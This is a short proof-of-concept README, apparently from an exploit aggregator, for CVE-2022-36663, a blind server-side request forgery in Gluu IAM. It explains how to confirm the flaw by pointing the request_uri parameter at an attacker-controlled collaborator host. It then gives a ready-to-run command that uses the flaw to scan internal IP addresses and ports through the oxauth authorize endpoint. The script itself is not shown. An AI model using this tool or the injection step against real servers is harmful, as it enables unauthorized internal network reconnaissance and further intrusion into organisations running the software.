## https://sploitus.com/exploit?id=190DF4DF-2FAA-52A7-A478-9F2059EFCFDF
# CVE-2022-36663-PoC
Internal network scanner through Gluu IAM blind ssrf
Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
To check if the target is vulnerable, add `&request_uri=http://burpcollab` to the `/oxauth/restv1/authorize` request and poll for incoming traffic from the target server.
# Usage
```python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='```
Url - the Gluu IAM server url
IP - The internal Ip address or subnet that you want to scan
Port - The internal port you want to scan
AR - The authorization request URL ending with an empty request_uri
![image](https://user-images.githubusercontent.com/84850150/197365625-d929cc4f-a87a-4f91-99c8-dd32decad1fb.png)